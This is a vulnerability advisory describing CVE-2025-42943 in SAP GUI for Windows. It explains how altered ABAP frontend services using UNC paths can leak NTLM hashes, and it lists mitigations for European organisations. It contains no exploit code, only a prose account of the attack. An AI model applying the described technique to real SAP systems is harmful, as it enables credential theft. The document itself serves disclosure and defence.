CVE-2025-42943 is a medium-severity vulnerability affecting SAP GUI for Windows version BC-FES-GUI 8.00. The issue arises from execution with unnecessary privileges (CWE-250), specifically when certain ABAP frontend services are invoked using UNC (Universal Naming Convention) paths. An attacker with developer authorization on a specific Application Server ABAP can modify code to exploit this flaw. When a victim uses SAP GUI for Windows to access these manipulated services, the system may automatically perform NTLM authentication, inadvertently leaking NTLM hashed credentials over the network. This leakage compromises the confidentiality of user credentials, potentially allowing attackers to perform credential replay or offline cracking attacks. The vulnerability requires high privileges (developer authorization) to set up the malicious code and user interaction (victim executing SAP GUI) to trigger the leak. The CVSS 3.1 score is 4.5 (medium), reflecting network attack vector, low attack complexity, high privileges required, and user interaction needed, with a high impact on confidentiality but no impact on integrity or availability. No known exploits are reported in the wild, and no patches are currently linked, indicating the need for proactive mitigation. This vulnerability highlights the risk of excessive privilege use in SAP environments and the dangers of automatic NTLM authentication in enterprise applications.

For European organizations, especially those heavily reliant on SAP ERP systems, this vulnerability poses a significant confidentiality risk. Leaked NTLM hashes can be used by attackers to escalate privileges or move laterally within corporate networks, potentially exposing sensitive business data, financial records, or personal data protected under GDPR. Given SAP's widespread adoption in Europe across sectors such as manufacturing, finance, and public administration, exploitation could lead to data breaches with regulatory and reputational consequences. The requirement for developer authorization limits the attack surface to insiders or compromised developer accounts, but the impact remains critical if exploited. Additionally, the automatic NTLM authentication behavior could expose credentials across internal networks, increasing risk in environments with weak network segmentation. The vulnerability does not affect system integrity or availability directly but undermines trust in credential confidentiality, which can cascade into broader security incidents.

European organizations should implement the following specific measures: 1) Restrict developer authorization strictly to trusted personnel and regularly audit these privileges to prevent unauthorized code changes. 2) Monitor and log ABAP code changes and frontend service calls involving UNC paths to detect suspicious activity. 3) Disable or limit the use of automatic NTLM authentication in SAP GUI where feasible, or enforce SMB signing and encryption to protect NTLM hashes in transit. 4) Apply network segmentation to isolate SAP Application Servers and limit exposure of SMB/UNC traffic to trusted zones only. 5) Educate SAP users about the risks of executing untrusted code or services via SAP GUI. 6) Engage with SAP support to obtain patches or workarounds once available and prioritize their deployment. 7) Employ multi-factor authentication and strong password policies to reduce the risk of credential compromise from leaked hashes. These targeted actions go beyond generic advice by focusing on privilege management, network controls, and SAP-specific configurations.